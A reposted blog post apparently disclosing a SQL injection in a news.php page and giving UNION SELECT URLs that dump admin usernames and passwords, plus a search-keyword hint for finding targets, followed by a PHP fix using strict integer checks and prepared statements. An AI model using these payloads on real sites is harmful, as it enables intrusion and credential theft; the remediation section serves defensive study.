Disqus is a world-famous real-time comment system; if you are not familiar with it, you can Google it yourself.

OK, this vulnerability is actually pretty trivial.

It is simply that news.php does not filter the id value. Here are the examples:

http://www.webshell.cc/news.php?id=-1+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646d696e

 
https://www.webshell.cc/news.php?id=-1+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+name0988b,0x5f,pass0988a),6,7,8+from+admin
The test method is:
https://www.webshell.cc/news.php?id=-1+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+name0988b,0x5f,pass0988a),6,7,8+from+admin

As for the Google keyword, just look it up yourself;
there is one at the bottom: blog comments powered by Disqus

The fix is simply: filtering.
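
One way to implement that filtering for a news.php-style handler, as an added example that is not code from the original post or from the affected application: strict integer validation of id plus a bound parameter. The table and column names (news, id, title, body), the function names and the in-memory SQLite data are assumptions made for the demo.

```php
<?php
// Added example: hardened lookup for a news.php-style handler.
// Table/column names (news, id, title, body) are assumptions.

// Pattern the post describes (id concatenated into the query unfiltered):
//   $sql = "SELECT * FROM news WHERE id = " . $_GET['id'];

function parse_news_id($raw): ?int
{
    // Accept only a plain positive decimal integer; arrays, signs,
    // whitespace and any SQL text are rejected before touching the DB.
    if (!is_string($raw) || !preg_match('/\A[1-9][0-9]{0,9}\z/', $raw)) {
        return null;
    }
    $id = (int)$raw;
    return $id <= 2147483647 ? $id : null;
}

function fetch_news(PDO $db, $rawId): ?array
{
    $id = parse_news_id($rawId);
    if ($id === null) {
        return null; // caller should answer 400/404 and log the request
    }
    // Bound parameter: the value is sent as data, never parsed as SQL.
    $stmt = $db->prepare('SELECT id, title, body FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec("INSERT INTO news VALUES (1, 'Hello', 'First post')");

// Constructed inputs: one valid id, one missing id, and malformed values.
$inputs = ['1', '2', '-1 union select 1,2,3', '1 OR 1=1', ['1']];
foreach ($inputs as $in) {
    $row = fetch_news($db, $in);
    echo json_encode($in), ' => ',
        $row ? $row['title'] : 'rejected / not found', PHP_EOL;
}
```

With MySQL, also set PDO::ATTR_EMULATE_PREPARES to false so the server performs the parameter binding.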

When reposting, please credit WebShell'S Blog. Address of this article: https://www.webshell.cc/1186.html